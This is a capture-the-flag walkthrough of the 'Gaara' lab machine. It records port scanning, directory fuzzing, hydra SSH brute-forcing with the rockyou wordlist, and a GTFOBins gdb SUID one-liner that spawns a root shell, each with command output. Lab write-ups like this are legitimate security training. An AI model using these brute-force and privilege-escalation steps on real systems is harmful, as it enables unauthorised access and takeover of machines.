Gaara
We first begin by performing a simple nmap scan to determine what ports are open and services running behind them.
➜ nmap -sC -sV -p- -T4 192.168.85.142
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-10 07:12 EDT
Stats: 0:07:46 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 87.61% done; ETC: 07:21 (0:01:05 remaining)
Nmap scan report for 192.168.85.142 (192.168.85.142)
Host is up (0.17s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 3e:a3:6f:64:03:33:1e:76:f8:e4:98:fe:be:e9:8e:58 (RSA)
| 256 6c:0e:b5:00:e7:42:44:48:65:ef:fe:d7:7c:e6:64:d5 (ECDSA)
|_ 256 b7:51:f2:f9:85:57:66:a8:65:54:2e:05:f9:40:d2:f4 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Gaara
|_http-server-header: Apache/2.4.38 (Debian)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 616.73 seconds
➜
Awesome, so we have Apache webserver running. Looking at the contents of the site, we get a static image with nothing much of help.
So i decided to bruteforce hidden directories and found /Cryoserver
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
➜ ffuf -u http://192.168.85.142/FUZZ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.3.0-dev
________________________________________________
:: Method : GET
:: URL : http://192.168.85.142/FUZZ
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
________________________________________________
server-status [Status: 403, Size: 279, Words: 20, Lines: 10]
Cryoserver [Status: 200, Size: 327, Words: 1, Lines: 303]
:: Progress: [233315/1273833] :: Job [1/1] :: 238 req/sec :: Duration: [0:17:40] :: Errors: 0 ::^Z
[1] + 2495 suspended ./ffuf -u http://192.168.85.142/FUZZ -w
Scrolling down on what seemed like a blank page, revealed three hidden directories named after characters in the Naruto Anime.
| curl http://192.168.85.142/iamGaara | grep -oE ‘\w+’ | sort -u > gara.txt |
We get a base58 encoded string which we can easily decode using CyberChef
Looks like we found a username & password. Since we did not come across a login screen, i tried to ssh into the machine using the creds but unfortunately they did not work. So i thought, since we have a username that we have come across severaly while enumerating, how about we try bruteforce ssh with hydra?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
➜ hydra -l gaara -P /usr/share/wordlists/rockyou.txt 192.168.85.142 ssh
Hydra v9.2 (c) 2021 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-05-10 07:19:54
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.85.142:22/
[STATUS] 146.00 tries/min, 146 tries in 00:01h, 14344256 to do in 1637:29h, 16 active
[22][ssh] host: 192.168.85.142 login: gaara password: iloveyou2
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 4 final worker threads did not complete until end.
[ERROR] 4 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-05-10 07:21:54
Oh yes. We now have a valid password. Lets ssh and get our first flag.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
➜ ssh gaara@192.168.85.142
gaara@192.168.85.142's password:
Linux Gaara 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
gaara@Gaara:~$ id
uid=1001(gaara) gid=1001(gaara) groups=1001(gaara)
gaara@Gaara:~$ ls -la
total 32
drwxr-xr-x 2 gaara gaara 4096 Apr 27 2021 .
drwxr-xr-x 3 root root 4096 Dec 13 2020 ..
lrwxrwxrwx 1 root root 9 Mar 30 2021 .bash_history -> /dev/null
-rw-r--r-- 1 gaara gaara 220 Dec 13 2020 .bash_logout
-rw-r--r-- 1 gaara gaara 3526 Dec 13 2020 .bashrc
-rw-r--r-- 1 gaara gaara 32 Apr 27 2021 flag.txt
-rw-r--r-- 1 gaara gaara 33 May 10 07:11 local.txt
-rw-r--r-- 1 gaara gaara 807 Dec 13 2020 .profile
-rw------- 1 gaara gaara 102 Dec 13 2020 .Xauthority
gaara@Gaara:~$ cat flag.txt
Your flag is in another file...
gaara@Gaara:~$ wc local.txt
1 1 33 local.txt
We can then try find a way to privesc. In this case i looked at binaries with SUID bit set and gdb stood out.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
gaara@Gaara:~$ find / -type f -perm -04000 -ls 2>/dev/null
12750 52 -rwsr-xr-- 1 root messagebus 51184 Jul 5 2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
135600 12 -rwsr-xr-x 1 root root 10232 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
16097 428 -rwsr-xr-x 1 root root 436552 Jan 31 2020 /usr/lib/openssh/ssh-keysign
22040 7824 -rwsr-sr-x 1 root root 8008480 Oct 14 2019 /usr/bin/gdb
19754 156 -rwsr-xr-x 1 root root 157192 Feb 2 2020 /usr/bin/sudo
21629 7396 -rwsr-sr-x 1 root root 7570720 Dec 24 2018 /usr/bin/gimp-2.10
22047 36 -rwsr-xr-x 1 root root 34896 Apr 22 2020 /usr/bin/fusermount
53 44 -rwsr-xr-x 1 root root 44528 Jul 27 2018 /usr/bin/chsh
52 56 -rwsr-xr-x 1 root root 54096 Jul 27 2018 /usr/bin/chfn
55 84 -rwsr-xr-x 1 root root 84016 Jul 27 2018 /usr/bin/gpasswd
3436 44 -rwsr-xr-x 1 root root 44440 Jul 27 2018 /usr/bin/newgrp
3583 64 -rwsr-xr-x 1 root root 63568 Jan 10 2019 /usr/bin/su
56 64 -rwsr-xr-x 1 root root 63736 Jul 27 2018 /usr/bin/passwd
3908 52 -rwsr-xr-x 1 root root 51280 Jan 10 2019 /usr/bin/mount
3910 36 -rwsr-xr-x 1 root root 34888 Jan 10 2019 /usr/bin/umount
Doing a quick lookup at GTFO bins, we get a way a way to create a backdoor to maintain privileged access by manipulating its own process UID.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
gaara@Gaara:~$ /usr/bin/gdb -nx -ex 'python import os; os.execl("/bin/sh", "sh", "-p")' -ex quit
GNU gdb (Debian 8.2.1-2+b3) 8.2.1
Copyright (C) 2018 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word".
# id
uid=1001(gaara) gid=1001(gaara) euid=0(root) egid=0(root) groups=0(root),1001(gaara)
# cd /root
# ls -la
total 28
drwx------ 3 root root 4096 May 10 07:11 .
drwxr-xr-x 18 root root 4096 Dec 13 2020 ..
lrwxrwxrwx 1 root root 9 Mar 30 2021 .bash_history -> /dev/null
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw------- 1 root root 33 May 10 07:11 proof.txt
-rw-r--r-- 1 root root 32 Apr 27 2021 root.txt
drwxr-xr-x 2 root root 4096 Mar 30 2021 .ssh
# cat root.txt
Your flag is in another file...
# wc root.txt
1 6 32 root.txt
#
This post is licensed under CC BY 4.0 by the author.
Comments powered by Disqus.